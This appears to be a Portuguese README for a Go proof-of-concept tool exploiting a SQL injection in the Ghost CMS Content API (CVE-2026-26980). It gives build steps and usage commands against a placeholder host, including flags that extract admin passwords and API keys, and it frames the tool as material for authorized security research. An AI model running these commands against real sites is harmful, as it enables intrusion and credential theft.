
PoC baseado em Go para injeção de SQL na Content API do Ghost CMS (CVE-2026-26980). Verifica a vulnerabilidade, extrai credenciais de administrador e segredos da API, e valida correções nas versões afetadas 3.24.0–6.19.0.
Este repositório contém uma ferramenta de prova de conceito baseada em Go para demonstrar e validar a vulnerabilidade de injeção de SQL na Content API do Ghost CMS descrita pela CVE-2026-26980. A implementação é baseada no fluxo de exploração implementado no arquivo-fonte principal em Go e destina-se exclusivamente a pesquisas e testes de segurança autorizados.
O PoC tem como alvo instâncias do Ghost CMS afetadas por uma vulnerabilidade de ordenação no filtro de slug da Content API. Ele pode:
A implementação tem como referência o seguinte contexto de aviso:
git clone https://github.com/gagaltotal/CVE-2026-26980-Ghost-CMS-Api
cd CVE-2026-26980-Ghost-CMS-Api
go mod init CVE-2026-26980-Ghost-CMS-Api
go mod tidy
A partir da raiz do projeto, compile o binário com:
go build -o ghost-sqli ghost_sqli_cms.go
OR
go run ghost_sqli_cms.go


./ghost-sqli --help

./ghost-sqli --url http://target.example:2368
./ghost-sqli --url http://target.example:2368 --extract-password --extract-api-key
./ghost-sqli --url http://target.example:2368 --validate-fix
./ghost-sqli --url http://target.example:2368 --content-key "your-content-api-key"
./ghost-sqli --url http://target.example:2368 -v
Este projeto é fornecido apenas para fins educacionais e de avaliação de segurança autorizada. Utilize-o somente contra sistemas que você possui, que está autorizado a testar ou que esteja avaliando em um ambiente controlado. Acesso não autorizado ou exploração de sistemas de terceiros é ilegal e pode violar leis aplicáveis.